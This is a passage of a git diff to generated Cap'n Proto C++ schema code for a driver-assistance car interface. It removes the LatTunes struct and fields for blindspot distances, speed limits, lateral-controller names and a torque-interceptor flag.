0, 0, 0, 0, 0, 0, 0, - 29, 0, 0, 0, 175, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 99, 97, 114, 46, 99, 97, 112, 110, - 112, 58, 67, 97, 114, 80, 97, 114, - 97, 109, 115, 46, 76, 97, 116, 84, - 117, 110, 101, 115, 0, 0, 0, 0, - 0, 0, 0, 0, 1, 0, 1, 0, - 12, 0, 0, 0, 3, 0, 4, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 1, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 69, 0, 0, 0, 34, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 64, 0, 0, 0, 3, 0, 1, 0, - 76, 0, 0, 0, 2, 0, 1, 0, - 1, 0, 0, 0, 1, 0, 0, 0, - 0, 0, 1, 0, 1, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 73, 0, 0, 0, 34, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 68, 0, 0, 0, 3, 0, 1, 0, - 80, 0, 0, 0, 2, 0, 1, 0, - 2, 0, 0, 0, 2, 0, 0, 0, - 0, 0, 1, 0, 2, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 77, 0, 0, 0, 58, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 72, 0, 0, 0, 3, 0, 1, 0, - 84, 0, 0, 0, 2, 0, 1, 0, - 112, 105, 100, 0, 0, 0, 0, 0, - 16, 0, 0, 0, 0, 0, 0, 0, - 46, 76, 209, 203, 63, 114, 34, 150, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 16, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 108, 113, 114, 0, 0, 0, 0, 0, - 16, 0, 0, 0, 0, 0, 0, 0, - 18, 106, 97, 40, 63, 30, 21, 157, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 16, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 116, 111, 114, 113, 117, 101, 0, 0, - 16, 0, 0, 0, 0, 0, 0, 0, - 29, 204, 78, 128, 14, 110, 54, 128, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 16, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, } -}; -::capnp::word const* const bp_f72e3aad63d6db57 = b_f72e3aad63d6db57.words; -#if !CAPNP_LITE -static const ::capnp::_::RawSchema* const d_f72e3aad63d6db57[] = { - &s_80366e0e804ecc1d, - &s_9622723fcbd14c2e, - &s_9d151e3f28616a12, -}; -static const uint16_t m_f72e3aad63d6db57[] = {1, 0, 2}; -static const uint16_t i_f72e3aad63d6db57[] = {0, 1, 2}; -const ::capnp::_::RawSchema s_f72e3aad63d6db57 = { - 0xf72e3aad63d6db57, b_f72e3aad63d6db57.words, 63, d_f72e3aad63d6db57, m_f72e3aad63d6db57, - 3, 3, i_f72e3aad63d6db57, nullptr, nullptr, { &s_f72e3aad63d6db57, nullptr, nullptr, 0, 0, nullptr } + 0x8c69372490aaa9da, b_8c69372490aaa9da.words, 1252, d_8c69372490aaa9da, m_8c69372490aaa9da, + 10, 69, i_8c69372490aaa9da, nullptr, nullptr, { &s_8c69372490aaa9da, nullptr, nullptr, 0, 0, nullptr } }; #endif // !CAPNP_LITE static const ::capnp::_::AlignedData<85> b_e836349c6056b0c9 = { @@ -6758,7 +6479,7 @@ static const ::capnp::_::AlignedData<78> b_93fc580a35339568 = { 104, 149, 51, 53, 10, 88, 252, 147, 20, 0, 0, 0, 1, 0, 17, 0, 218, 169, 170, 144, 36, 55, 105, 140, - 15, 0, 7, 0, 1, 0, 4, 0, + 14, 0, 7, 0, 1, 0, 4, 0, 7, 0, 0, 0, 0, 0, 0, 0, 21, 0, 0, 0, 18, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, @@ -6952,14 +6673,6 @@ constexpr ::capnp::Kind CarParams::_capnpPrivate::kind; constexpr ::capnp::_::RawSchema const* CarParams::_capnpPrivate::schema; #endif // !CAPNP_LITE -// CarParams::LatTunes -constexpr uint16_t CarParams::LatTunes::_capnpPrivate::dataWordSize; -constexpr uint16_t CarParams::LatTunes::_capnpPrivate::pointerCount; -#if !CAPNP_LITE -constexpr ::capnp::Kind CarParams::LatTunes::_capnpPrivate::kind; -constexpr ::capnp::_::RawSchema const* CarParams::LatTunes::_capnpPrivate::schema; -#endif // !CAPNP_LITE - // CarParams::SafetyConfig constexpr uint16_t CarParams::SafetyConfig::_capnpPrivate::dataWordSize; constexpr uint16_t CarParams::SafetyConfig::_capnpPrivate::pointerCount; diff --git a/cereal/gen/cpp/car.capnp.h b/cereal/gen/cpp/car.capnp.h index caa30473f..f198bd245 100644 --- a/cereal/gen/cpp/car.capnp.h +++ b/cereal/gen/cpp/car.capnp.h @@ -135,11 +135,6 @@ enum class EventName_baa8c5d505f727de: uint16_t { STEER_TIME_LIMIT, VEHICLE_SENSORS_INVALID, CALIBRATION_RECALIBRATING, - SPEED_LIMIT_ACTIVE, - SPEED_LIMIT_VALUE_CHANGE, - LEAD_MOVING_ALERT_SILENT, - LEAD_MOVING_ALERT, - MANUAL_STEERING_REQUIRED_BLINKERS_ON, }; CAPNP_DECLARE_ENUM(EventName, baa8c5d505f727de); CAPNP_DECLARE_SCHEMA(9da4fa09e052903c); @@ -223,7 +218,6 @@ enum class AudibleAlert_f5a5e26c954e339e: uint16_t { }; CAPNP_DECLARE_ENUM(AudibleAlert, f5a5e26c954e339e); CAPNP_DECLARE_SCHEMA(8c69372490aaa9da); -CAPNP_DECLARE_SCHEMA(f72e3aad63d6db57); CAPNP_DECLARE_SCHEMA(e836349c6056b0c9); CAPNP_DECLARE_SCHEMA(b581b23b1c89dda3); CAPNP_DECLARE_SCHEMA(9622723fcbd14c2e); @@ -360,7 +354,7 @@ struct CarState { struct ButtonEvent; struct _capnpPrivate { - CAPNP_DECLARE_STRUCT_HEADER(9da4fa09e052903c, 11, 6) + CAPNP_DECLARE_STRUCT_HEADER(9da4fa09e052903c, 8, 6) #if !CAPNP_LITE static constexpr ::capnp::_::RawBrandedSchema const* brand() { return &schema->defaultBrand; } #endif // !CAPNP_LITE @@ -390,7 +384,7 @@ struct CarState::CruiseState { class Pipeline; struct _capnpPrivate { - CAPNP_DECLARE_STRUCT_HEADER(e64e81478e6e60af, 3, 0) + CAPNP_DECLARE_STRUCT_HEADER(e64e81478e6e60af, 2, 0) #if !CAPNP_LITE static constexpr ::capnp::_::RawBrandedSchema const* brand() { return &schema->defaultBrand; } #endif // !CAPNP_LITE @@ -458,7 +452,7 @@ struct CarControl { struct HUDControl; struct _capnpPrivate { - CAPNP_DECLARE_STRUCT_HEADER(f78829049ab814af, 3, 7) + CAPNP_DECLARE_STRUCT_HEADER(f78829049ab814af, 3, 6) #if !CAPNP_LITE static constexpr ::capnp::_::RawBrandedSchema const* brand() { return &schema->defaultBrand; } #endif // !CAPNP_LITE @@ -522,7 +516,6 @@ struct CarParams { class Reader; class Builder; class Pipeline; - struct LatTunes; struct SafetyConfig; struct LateralParams; struct LateralPIDTuning; @@ -546,22 +539,7 @@ struct CarParams { struct LateralTuning; struct _capnpPrivate { - CAPNP_DECLARE_STRUCT_HEADER(8c69372490aaa9da, 17, 15) - #if !CAPNP_LITE - static constexpr ::capnp::_::RawBrandedSchema const* brand() { return &schema->defaultBrand; } - #endif // !CAPNP_LITE - }; -}; - -struct CarParams::LatTunes { - LatTunes() = delete; - - class Reader; - class Builder; - class Pipeline; - - struct _capnpPrivate { - CAPNP_DECLARE_STRUCT_HEADER(f72e3aad63d6db57, 0, 3) + CAPNP_DECLARE_STRUCT_HEADER(8c69372490aaa9da, 17, 14) #if !CAPNP_LITE static constexpr ::capnp::_::RawBrandedSchema const* brand() { return &schema->defaultBrand; } #endif // !CAPNP_LITE @@ -702,7 +680,7 @@ struct CarParams::LateralTuning { }; struct _capnpPrivate { - CAPNP_DECLARE_STRUCT_HEADER(93fc580a35339568, 17, 15) + CAPNP_DECLARE_STRUCT_HEADER(93fc580a35339568, 17, 14) #if !CAPNP_LITE static constexpr ::capnp::_::RawBrandedSchema const* brand() { return &schema->defaultBrand; } #endif // !CAPNP_LITE @@ -956,18 +934,6 @@ public: inline bool getCarFaultedNonCritical() const; - inline ::uint8_t getDistanceLines() const; - - inline float getRightBlindspotD1() const; - - inline float getRightBlindspotD2() const; - - inline float getLeftBlindspotD1() const; - - inline float getLeftBlindspotD2() const; - - inline float getBlindspotside() const; - private: ::capnp::_::StructReader _reader; template @@ -1166,24 +1132,6 @@ public: inline bool getCarFaultedNonCritical(); inline void setCarFaultedNonCritical(bool value); - inline ::uint8_t getDistanceLines(); - inline void setDistanceLines( ::uint8_t value); - - inline float getRightBlindspotD1(); - inline void setRightBlindspotD1(float value); - - inline float getRightBlindspotD2(); - inline void setRightBlindspotD2(float value); - - inline float getLeftBlindspotD1(); - inline void setLeftBlindspotD1(float value); - - inline float getLeftBlindspotD2(); - inline void setLeftBlindspotD2(float value); - - inline float getBlindspotside(); - inline void setBlindspotside(float value); - private: ::capnp::_::StructBuilder _builder; template @@ -1334,8 +1282,6 @@ public: inline float getSpeedCluster() const; - inline float getSpeedLimit() const; - private: ::capnp::_::StructReader _reader; template @@ -1385,9 +1331,6 @@ public: inline float getSpeedCluster(); inline void setSpeedCluster(float value); - inline float getSpeedLimit(); - inline void setSpeedLimit(float value); - private: ::capnp::_::StructBuilder _builder; template @@ -1761,9 +1704,6 @@ public: inline bool getRightBlinker() const; - inline bool hasLatController() const; - inline ::capnp::Text::Reader getLatController() const; - private: ::capnp::_::StructReader _reader; template @@ -1869,13 +1809,6 @@ public: inline bool getRightBlinker(); inline void setRightBlinker(bool value); - inline bool hasLatController(); - inline ::capnp::Text::Builder getLatController(); - inline void setLatController( ::capnp::Text::Reader value); - inline ::capnp::Text::Builder initLatController(unsigned int size); - inline void adoptLatController(::capnp::Orphan< ::capnp::Text>&& value); - inline ::capnp::Orphan< ::capnp::Text> disownLatController(); - private: ::capnp::_::StructBuilder _builder; template @@ -2407,11 +2340,6 @@ public: inline bool getExperimentalLongitudinalAvailable() const; - inline bool getEnableTorqueInterceptor() const; - - inline bool hasLatTuneCollection() const; - inline ::cereal::CarParams::LatTunes::Reader getLatTuneCollection() const; - private: ::capnp::_::StructReader _reader; template @@ -2705,16 +2633,6 @@ public: inline bool getExperimentalLongitudinalAvailable(); inline void setExperimentalLongitudinalAvailable(bool value); - inline bool getEnableTorqueInterceptor(); - inline void setEnableTorqueInterceptor(bool value); - - inline bool hasLatTuneCollection(); - inline ::cereal::CarParams::LatTunes::Builder getLatTuneCollection(); - inline void setLatTuneCollection( ::cereal::CarParams::LatTunes::Reader value); - inline ::cereal::CarParams::LatTunes::Builder initLatTuneCollection(); - inline void adoptLatTuneCollection(::capnp::Orphan< ::cereal::CarParams::LatTunes>&& value); - inline ::capnp::Orphan< ::cereal::CarParams::LatTunes> disownLatTuneCollection(); - private: ::capnp::_::StructBuilder _builder; template @@ -2736,111 +2654,6 @@ public: inline ::cereal::CarParams::LongitudinalPIDTuning::Pipeline getLongitudinalTuning(); inline typename LateralTuning::Pipeline getLateralTuning(); inline ::cereal::CarParams::LateralParams::Pipeline getLateralParams(); - inline ::cereal::CarParams::LatTunes::Pipeline getLatTuneCollection(); -private: - ::capnp::AnyPointer::Pipeline _typeless; - friend class ::capnp::PipelineHook; - template - friend struct ::capnp::ToDynamic_; -}; -#endif // !CAPNP_LITE - -class CarParams::LatTunes::Reader { -public: - typedef LatTunes Reads; - - Reader() = default; - inline explicit Reader(::capnp::_::StructReader base): _reader(base) {} - - inline ::capnp::MessageSize totalSize() const { - return _reader.totalSize().asPublic(); - } - -#if !CAPNP_LITE - inline ::kj::StringTree toString() const { - return ::capnp::_::structString(_reader, *_capnpPrivate::brand()); - } -#endif // !CAPNP_LITE - - inline bool hasPid() const; - inline ::cereal::CarParams::LateralPIDTuning::Reader getPid() const; - - inline bool hasLqr() const; - inline ::cereal::CarParams::LateralLQRTuning::Reader getLqr() const; - - inline bool hasTorque() const; - inline ::cereal::CarParams::LateralTorqueTuning::Reader getTorque() const; - -private: - ::capnp::_::StructReader _reader; - template - friend struct ::capnp::ToDynamic_; - template - friend struct ::capnp::_::PointerHelpers; - template - friend struct ::capnp::List; - friend class ::capnp::MessageBuilder; - friend class ::capnp::Orphanage; -}; - -class CarParams::LatTunes::Builder { -public: - typedef LatTunes Builds; - - Builder() = delete; // Deleted to discourage incorrect usage. - // You can explicitly initialize to nullptr instead. - inline Builder(decltype(nullptr)) {} - inline explicit Builder(::capnp::_::StructBuilder base): _builder(base) {} - inline operator Reader() const { return Reader(_builder.asReader()); } - inline Reader asReader() const { return *this; } - - inline ::capnp::MessageSize totalSize() const { return asReader().totalSize(); } -#if !CAPNP_LITE - inline ::kj::StringTree toString() const { return asReader().toString(); } -#endif // !CAPNP_LITE - - inline bool hasPid(); - inline ::cereal::CarParams::LateralPIDTuning::Builder getPid(); - inline void setPid( ::cereal::CarParams::LateralPIDTuning::Reader value); - inline ::cereal::CarParams::LateralPIDTuning::Builder initPid(); - inline void adoptPid(::capnp::Orphan< ::cereal::CarParams::LateralPIDTuning>&& value); - inline ::capnp::Orphan< ::cereal::CarParams::LateralPIDTuning> disownPid(); - - inline bool hasLqr(); - inline ::cereal::CarParams::LateralLQRTuning::Builder getLqr(); - inline void setLqr( ::cereal::CarParams::LateralLQRTuning::Reader value); - inline ::cereal::CarParams::LateralLQRTuning::Builder initLqr(); - inline void adoptLqr(::capnp::Orphan< ::cereal::CarParams::LateralLQRTuning>&& value); - inline ::capnp::Orphan< ::cereal::CarParams::LateralLQRTuning> disownLqr(); - - inline bool hasTorque(); - inline ::cereal::CarParams::LateralTorqueTuning::Builder getTorque(); - inline void setTorque( ::cereal::CarParams::LateralTorqueTuning::Reader value); - inline ::cereal::CarParams::LateralTorqueTuning::Builder initTorque(); - inline void adoptTorque(::capnp::Orphan< ::cereal::CarParams::LateralTorqueTuning>&& value); - inline ::capnp::Orphan< ::cereal::CarParams::LateralTorqueTuning> disownTorque(); - -private: - ::capnp::_::StructBuilder _builder; - template - friend struct ::capnp::ToDynamic_; - friend class ::capnp::Orphanage; - template - friend struct ::capnp::_::PointerHelpers; -}; - -#if !CAPNP_LITE -class CarParams::LatTunes::Pipeline { -public: - typedef LatTunes Pipelines; - - inline Pipeline(decltype(nullptr)): _typeless(nullptr) {} - inline explicit Pipeline(::capnp::AnyPointer::Pipeline&& typeless) - : _typeless(kj::mv(typeless)) {} - - inline ::cereal::CarParams::LateralPIDTuning::Pipeline getPid(); - inline ::cereal::CarParams::LateralLQRTuning::Pipeline getLqr(); - inline ::cereal::CarParams::LateralTorqueTuning::Pipeline getTorque(); private: ::capnp::AnyPointer::Pipeline _typeless; friend class ::capnp::PipelineHook; @@ -4950,90 +4763,6 @@ inline void CarState::Builder::setCarFaultedNonCritical(bool value) { ::capnp::bounded<362>() * ::capnp::ELEMENTS, value); } -inline ::uint8_t CarState::Reader::getDistanceLines() const { - return _reader.getDataField< ::uint8_t>( - ::capnp::bounded<46>() * ::capnp::ELEMENTS); -} - -inline ::uint8_t CarState::Builder::getDistanceLines() { - return _builder.getDataField< ::uint8_t>( - ::capnp::bounded<46>() * ::capnp::ELEMENTS); -} -inline void CarState::Builder::setDistanceLines( ::uint8_t value) { - _builder.setDataField< ::uint8_t>( - ::capnp::bounded<46>() * ::capnp::ELEMENTS, value); -} - -inline float CarState::Reader::getRightBlindspotD1() const { - return _reader.getDataField( - ::capnp::bounded<16>() * ::capnp::ELEMENTS); -} - -inline float CarState::Builder::getRightBlindspotD1() { - return _builder.getDataField( - ::capnp::bounded<16>() * ::capnp::ELEMENTS); -} -inline void CarState::Builder::setRightBlindspotD1(float value) { - _builder.setDataField( - ::capnp::bounded<16>() * ::capnp::ELEMENTS, value); -} - -inline float CarState::Reader::getRightBlindspotD2() const { - return _reader.getDataField( - ::capnp::bounded<17>() * ::capnp::ELEMENTS); -} - -inline float CarState::Builder::getRightBlindspotD2() { - return _builder.getDataField( - ::capnp::bounded<17>() * ::capnp::ELEMENTS); -} -inline void CarState::Builder::setRightBlindspotD2(float value) { - _builder.setDataField( - ::capnp::bounded<17>() * ::capnp::ELEMENTS, value); -} - -inline float CarState::Reader::getLeftBlindspotD1() const { - return _reader.getDataField( - ::capnp::bounded<18>() * ::capnp::ELEMENTS); -} - -inline float CarState::Builder::getLeftBlindspotD1() { - return _builder.getDataField( - ::capnp::bounded<18>() * ::capnp::ELEMENTS); -} -inline void CarState::Builder::setLeftBlindspotD1(float value) { - _builder.setDataField( - ::capnp::bounded<18>() * ::capnp::ELEMENTS, value); -} - -inline float CarState::Reader::getLeftBlindspotD2() const { - return _reader.getDataField( - ::capnp::bounded<19>() * ::capnp::ELEMENTS); -} - -inline float CarState::Builder::getLeftBlindspotD2() { - return _builder.getDataField( - ::capnp::bounded<19>() * ::capnp::ELEMENTS); -} -inline void CarState::Builder::setLeftBlindspotD2(float value) { - _builder.setDataField( - ::capnp::bounded<19>() * ::capnp::ELEMENTS, value); -} - -inline float CarState::Reader::getBlindspotside() const { - return _reader.getDataField( - ::capnp::bounded<20>() * ::capnp::ELEMENTS); -} - -inline float CarState::Builder::getBlindspotside() { - return _builder.getDataField( - ::capnp::bounded<20>() * ::capnp::ELEMENTS); -} -inline void CarState::Builder::setBlindspotside(float value) { - _builder.setDataField( - ::capnp::bounded<20>() * ::capnp::ELEMENTS, value); -} - inline float CarState::WheelSpeeds::Reader::getFl() const { return _reader.getDataField( ::capnp::bounded<0>() * ::capnp::ELEMENTS); @@ -5188,20 +4917,6 @@ inline void CarState::CruiseState::Builder::setSpeedCluster(float value) { ::capnp::bounded<3>() * ::capnp::ELEMENTS, value); } -inline float CarState::CruiseState::Reader::getSpeedLimit() const { - return _reader.getDataField( - ::capnp::bounded<4>() * ::capnp::ELEMENTS); -} - -inline float CarState::CruiseState::Builder::getSpeedLimit() { - return _builder.getDataField( - ::capnp::bounded<4>() * ::capnp::ELEMENTS); -} -inline void CarState::CruiseState::Builder::setSpeedLimit(float value) { - _builder.setDataField( - ::capnp::bounded<4>() * ::capnp::ELEMENTS, value); -} - inline bool CarState::ButtonEvent::Reader::getPressed() const { return _reader.getDataField( ::capnp::bounded<0>() * ::capnp::ELEMENTS); @@ -5824,40 +5539,6 @@ inline void CarControl::Builder::setRightBlinker(bool value) { ::capnp::bounded<5>() * ::capnp::ELEMENTS, value); } -inline bool CarControl::Reader::hasLatController() const { - return !_reader.getPointerField( - ::capnp::bounded<6>() * ::capnp::POINTERS).isNull(); -} -inline bool CarControl::Builder::hasLatController() { - return !_builder.getPointerField( - ::capnp::bounded<6>() * ::capnp::POINTERS).isNull(); -} -inline ::capnp::Text::Reader CarControl::Reader::getLatController() const { - return ::capnp::_::PointerHelpers< ::capnp::Text>::get(_reader.getPointerField( - ::capnp::bounded<6>() * ::capnp::POINTERS)); -} -inline ::capnp::Text::Builder CarControl::Builder::getLatController() { - return ::capnp::_::PointerHelpers< ::capnp::Text>::get(_builder.getPointerField( - ::capnp::bounded<6>() * ::capnp::POINTERS)); -} -inline void CarControl::Builder::setLatController( ::capnp::Text::Reader value) { - ::capnp::_::PointerHelpers< ::capnp::Text>::set(_builder.getPointerField( - ::capnp::bounded<6>() * ::capnp::POINTERS), value); -} -inline ::capnp::Text::Builder CarControl::Builder::initLatController(unsigned int size) { - return ::capnp::_::PointerHelpers< ::capnp::Text>::init(_builder.getPointerField( - ::capnp::bounded<6>() * ::capnp::POINTERS), size); -} -inline void CarControl::Builder::adoptLatController( - ::capnp::Orphan< ::capnp::Text>&& value) { - ::capnp::_::PointerHelpers< ::capnp::Text>::adopt(_builder.getPointerField( - ::capnp::bounded<6>() * ::capnp::POINTERS), kj::mv(value)); -} -inline ::capnp::Orphan< ::capnp::Text> CarControl::Builder::disownLatController() { - return ::capnp::_::PointerHelpers< ::capnp::Text>::disown(_builder.getPointerField( - ::capnp::bounded<6>() * ::capnp::POINTERS)); -} - inline float CarControl::Actuators::Reader::getGas() const { return _reader.getDataField( ::capnp::bounded<0>() * ::capnp::ELEMENTS); @@ -7456,176 +7137,6 @@ inline void CarParams::Builder::setExperimentalLongitudinalAvailable(bool value) ::capnp::bounded<995>() * ::capnp::ELEMENTS, value); } -inline bool CarParams::Reader::getEnableTorqueInterceptor() const { - return _reader.getDataField( - ::capnp::bounded<996>() * ::capnp::ELEMENTS); -} - -inline bool CarParams::Builder::getEnableTorqueInterceptor() { - return _builder.getDataField( - ::capnp::bounded<996>() * ::capnp::ELEMENTS); -} -inline void CarParams::Builder::setEnableTorqueInterceptor(bool value) { - _builder.setDataField( - ::capnp::bounded<996>() * ::capnp::ELEMENTS, value); -} - -inline bool CarParams::Reader::hasLatTuneCollection() const { - return !_reader.getPointerField( - ::capnp::bounded<14>() * ::capnp::POINTERS).isNull(); -} -inline bool CarParams::Builder::hasLatTuneCollection() { - return !_builder.getPointerField( - ::capnp::bounded<14>() * ::capnp::POINTERS).isNull(); -} -inline ::cereal::CarParams::LatTunes::Reader CarParams::Reader::getLatTuneCollection() const { - return ::capnp::_::PointerHelpers< ::cereal::CarParams::LatTunes>::get(_reader.getPointerField( - ::capnp::bounded<14>() * ::capnp::POINTERS)); -} -inline ::cereal::CarParams::LatTunes::Builder CarParams::Builder::getLatTuneCollection() { - return ::capnp::_::PointerHelpers< ::cereal::CarParams::LatTunes>::get(_builder.getPointerField( - ::capnp::bounded<14>() * ::capnp::POINTERS)); -} -#if !CAPNP_LITE -inline ::cereal::CarParams::LatTunes::Pipeline CarParams::Pipeline::getLatTuneCollection() { - return ::cereal::CarParams::LatTunes::Pipeline(_typeless.getPointerField(14)); -} -#endif // !CAPNP_LITE -inline void CarParams::Builder::setLatTuneCollection( ::cereal::CarParams::LatTunes::Reader value) { - ::capnp::_::PointerHelpers< ::cereal::CarParams::LatTunes>::set(_builder.getPointerField( - ::capnp::bounded<14>() * ::capnp::POINTERS), value); -} -inline ::cereal::CarParams::LatTunes::Builder CarParams::Builder::initLatTuneCollection() { - return ::capnp::_::PointerHelpers< ::cereal::CarParams::LatTunes>::init(_builder.getPointerField( - ::capnp::bounded<14>() * ::capnp::POINTERS)); -} -inline void CarParams::Builder::adoptLatTuneCollection( - ::capnp::Orphan< ::cereal::CarParams::LatTunes>&& value) { - ::capnp::_::PointerHelpers< ::cereal::CarParams::LatTunes>::adopt(_builder.getPointerField( - ::capnp::bounded<14>() * ::capnp::POINTERS), kj::mv(value)); -} -inline ::capnp::Orphan< ::cereal::CarParams::LatTunes> CarParams::Builder::disownLatTuneCollection() { - return ::capnp::_::PointerHelpers< ::cereal::CarParams::LatTunes>::disown(_builder.getPointerField( - ::capnp::bounded<14>() * ::capnp::POINTERS)); -} - -inline bool CarParams::LatTunes::Reader::hasPid() const { - return !_reader.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS).isNull(); -} -inline bool CarParams::LatTunes::Builder::hasPid() { - return !_builder.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS).isNull(); -} -inline ::cereal::CarParams::LateralPIDTuning::Reader CarParams::LatTunes::Reader::getPid() const { - return ::capnp::_::PointerHelpers< ::cereal::CarParams::LateralPIDTuning>::get(_reader.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS)); -} -inline ::cereal::CarParams::LateralPIDTuning::Builder CarParams::LatTunes::Builder::getPid() { - return ::capnp::_::PointerHelpers< ::cereal::CarParams::LateralPIDTuning>::get(_builder.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS)); -} -#if !CAPNP_LITE -inline ::cereal::CarParams::LateralPIDTuning::Pipeline CarParams::LatTunes::Pipeline::getPid() { - return ::cereal::CarParams::LateralPIDTuning::Pipeline(_typeless.getPointerField(0)); -} -#endif // !CAPNP_LITE -inline void CarParams::LatTunes::Builder::setPid( ::cereal::CarParams::LateralPIDTuning::Reader value) { - ::capnp::_::PointerHelpers< ::cereal::CarParams::LateralPIDTuning>::set(_builder.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS), value); -} -inline ::cereal::CarParams::LateralPIDTuning::Builder CarParams::LatTunes::Builder::initPid() { - return ::capnp::_::PointerHelpers< ::cereal::CarParams::LateralPIDTuning>::init(_builder.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS)); -} -inline void CarParams::LatTunes::Builder::adoptPid( - ::capnp::Orphan< ::cereal::CarParams::LateralPIDTuning>&& value) { - ::capnp::_::PointerHelpers< ::cereal::CarParams::LateralPIDTuning>::adopt(_builder.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS), kj::mv(value)); -} -inline ::capnp::Orphan< ::cereal::CarParams::LateralPIDTuning> CarParams::LatTunes::Builder::disownPid() { - return ::capnp::_::PointerHelpers< ::cereal::CarParams::LateralPIDTuning>::disown(_builder.getPointerField( - ::capnp::bounded<0>() * ::capnp::POINTERS)); -} - -inline bool CarParams::LatTunes::Reader::hasLqr() const { - return !_reader.getPointerField( - ::capnp::bounded<1>() * ::capnp::POINTERS).isNull(); -} -inline bool CarParams::LatTunes::Builder::hasLqr() { - return !_builder.getPointerField( - ::capnp::bounded<1>() * ::capnp::POINTERS).isNull(); -} -inline ::cereal::CarParams::LateralLQRTuning::Reader CarParams::LatTunes::Reader::getLqr() const { - return ::capnp::_::PointerHelpers< ::cereal::CarParams::LateralLQRTuning>::get(_reader.getPointerField( - ::capnp::bounded<1>() * ::capnp::POINTERS)); -} -inline ::cereal::CarParams::LateralLQRTuning::Builder CarParams::LatTunes::Builder::getLqr() { - return ::capnp::_::PointerHelpers< ::cereal::CarParams::LateralLQRTuning>::get(_builder.getPointerField( - ::capnp::bounded<1>() * ::capnp::POINTERS)); -} -#if !CAPNP_LITE -inline ::cereal::CarParams::LateralLQRTuning::Pipeline CarParams::LatTunes::Pipeline::getLqr() { - return ::cereal::CarParams::LateralLQRTuning::Pipeline(_typeless.getPointerField(1)); -} -#endif // !CAPNP_LITE -inline void CarParams::LatTunes::Builder::setLqr( ::cereal::CarParams::LateralLQRTuning::Reader value) { - ::capnp::_::PointerHelpers< ::cereal::CarParams::LateralLQRTuning>::set(_builder.getPointerField( - ::capnp::bounded<1>() * ::capnp::POINTERS), value); -} -inline ::cereal::CarParams::LateralLQRTuning::Builder CarParams::LatTunes::Builder::initLqr() { - return ::capnp::_::PointerHelpers< ::cereal::CarParams::LateralLQRTuning>::init(_builder.getPointerField( - ::capnp::bounded<1>() * ::capnp::POINTERS)); -} -inline void CarParams::LatTunes::Builder::adoptLqr( - ::capnp::Orphan< ::cereal::CarParams::LateralLQRTuning>&& value) { - ::capnp::_::PointerHelpers< ::cereal::CarParams::LateralLQRTuning>::adopt(_builder.getPointerField( - ::capnp::bounded<1>() * ::capnp::POINTERS), kj::mv(value)); -} -inline ::capnp::Orphan< ::cereal::CarParams::LateralLQRTuning> CarParams::LatTunes::Builder::disownLqr() { - return ::capnp::_::PointerHelpers< ::cereal::CarParams::LateralLQRTuning>::disown(_builder.getPointerField( - ::capnp::bounded<1>() * ::capnp::POINTERS)); -} - -inline bool CarParams::LatTunes::Reader::hasTorque() const { - return !_reader.getPointerField( - ::capnp::bounded<2>() * ::capnp::POINTERS).isNull(); -} -inline bool CarParams::LatTunes::Builder::hasTorque() { - return !_builder.getPointerField( - ::capnp::bounded<2>() * ::capnp::POINTERS).isNull(); -} -inline ::cereal::CarParams::LateralTorqueTuning::Reader CarParams::LatTunes::Reader::getTorque() const { - return ::capnp::_::PointerHelpers< ::cereal::CarParams::LateralTorqueTuning>::get(_reader.getPointerField( - ::capnp::bounded<2>() * ::capnp::POINTERS)); -} -inline ::cereal::CarParams::LateralTorqueTuning::Builder CarParams::LatTunes::Builder::getTorque() { - return ::capnp::_::PointerHelpers< ::cereal::CarParams::LateralTorqueTuning>::get(_builder.getPointerField( - ::capnp::bounded<2>() * ::capnp::POINTERS)); -} -#if !CAPNP_LITE -inline ::cereal::CarParams::LateralTorqueTuning::Pipeline CarParams::LatTunes::Pipeline::getTorque() { - return ::cereal::CarParams::LateralTorqueTuning::Pipeline(_typeless.getPointerField(2)); -} -#endif // !CAPNP_LITE -inline void CarParams::LatTunes::Builder::setTorque( ::cereal::CarParams::LateralTorqueTuning::Reader value) { - ::capnp::_::PointerHelpers< ::cereal::CarParams::LateralTorqueTuning>::set(_builder.getPointerField( - ::capnp::bounded<2>() * ::capnp::POINTERS), value); -} -inline ::cereal::CarParams::LateralTorqueTuning::Builder CarParams::LatTunes::Builder::initTorque() { - return ::capnp::_::PointerHelpers< ::cereal::CarParams::LateralTorqueTuning>::init(_builder.getPointerField( - ::capnp::bounded<2>() * ::capnp::POINTERS)); -} -inline void CarParams::LatTunes::Builder::adoptTorque( - ::capnp::Orphan< ::cereal::CarParams::LateralTorqueTuning>&& value) { - ::capnp::_::PointerHelpers< ::cereal::CarParams::LateralTorqueTuning>::adopt(_builder.getPointerField( - ::capnp::bounded<2>() * ::capnp::POINTERS), kj::mv(value)); -} -inline ::capnp::Orphan< ::cereal::CarParams::LateralTorqueTuning> CarParams::LatTunes::Builder::disownTorque() { - return ::capnp::_::PointerHelpers< ::cereal::CarParams::LateralTorqueTuning>::disown(_builder.getPointerField( - ::capnp::bounded<2>() * 